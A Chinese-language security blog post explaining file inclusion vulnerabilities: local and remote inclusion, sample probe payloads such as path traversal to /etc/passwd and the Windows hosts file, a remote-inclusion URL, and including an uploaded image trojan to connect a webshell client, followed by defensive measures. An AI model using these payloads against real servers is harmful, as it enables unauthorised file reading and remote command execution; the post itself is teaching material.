文件包含漏洞
文件包含漏洞(一个文件包含另一个文件并将另一个文件解析执行)
定义:是指服务器利用URL去动态包含文件,如果文件中存在恶意代码,无论什么样的后缀类型,文件内的恶意代码都会被解析执行,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。
类型:
本地文件包含,当被包含的文件在服务器本地时,就形成本地文件包含
远程文件包含,当被包含的文件在第三方服务器时,叫做远程文件包含。
手动挖掘特征:
?file=…/…/…/…/etc/passwd
?page=file:///etc/passwd
?home=main.cgi
?page=http://www.a.com/1.php
http://1.1.1.1/…/…/…/…/dir/file.txt
漏洞利用:
1.读取敏感文件
条件
① 目标主机文件存在(目标文件的绝对路径和相对路径);
② 具有文件可读权限
提交参数?path=c:\windows\System32\drivers\etc\hosts读取本地host文件
?path=…\windows\System 32\drivers\etc\hosts x先返回到最上级目录即根目录er
2.直接包含图片木马
可以利用文件包含漏洞直接包含图片木马,直接包含图片木马127.0.0.1/upload-labs-master/upload//include.php?file=upload/1.jpg
然后使用蚁剑或者中国菜刀连接
3.包含木马写shell
可以将以下代码写入图片中
防范
1.在功能上尽量不要将文件包含函数对应的文件放给前面进行选择和操作
2.通过白名单策略,仅允许包含运行指定的文件,其他都禁止
3.设计严格的过滤
如:对所有输入提交可能包含的文件地址,包括服务器本地文件及远程文件,进行严格的检查,参数中不允许出现… /之类的目录跳转符。
可以通过调用str_replace()函数实现相关敏感字符的过滤,一定程度上防御了远程文件包含。
参考链接:
https://www.csdn.net/tags/NtzaQgzsOTc1MTgtYmxvZwO0O0OO0O0O.html
https://blog.csdn.net/qq_50673174/article/details/124760011
https://blog.csdn.net/m0_52556798/article/details/123795340
本文来自博客园,作者:lzstar-A2,转载请注明原文链接:https://www.cnblogs.com/lzstar/p/15399235.html
作 者:lzstar-A2
出 处:https://www.cnblogs.com/lzstar/
关于作者:一名java转安全的在校大学生
版权声明:本文版权归作者和博客园共有,欢迎转载,但未经作者同意必须保留此段声明,且在文章页面明显位置给出原文链接。
特此声明:所有评论和私信都会在第一时间回复。也欢迎园子的大大们指正错误,共同进步。或者直接私信我
声援博主:如果您觉得文章对您有帮助,可以点击文章右下角【推荐】一下。您的鼓励是作者坚持原创和持续写作的最大动力!
欢迎大家关注安全学习交流群菜鸟联盟(IThonest),如果您觉得文章对您有很大的帮助,您可以考虑赏博主一杯可乐以资鼓励,您的肯定将是我最大的动力。thx.
菜鸟联盟(IThonest),一个可能会有故事的qq群,欢迎大家来这里讨论,共同进步,不断学习才能不断进步。扫下面的二维码或者收藏下面的二维码关注吧(长按下面的二维码图片、并选择识别图中的二维码),个人QQ和微信的二维码也已给出,扫描下面👇的二维码一起来讨论吧!!!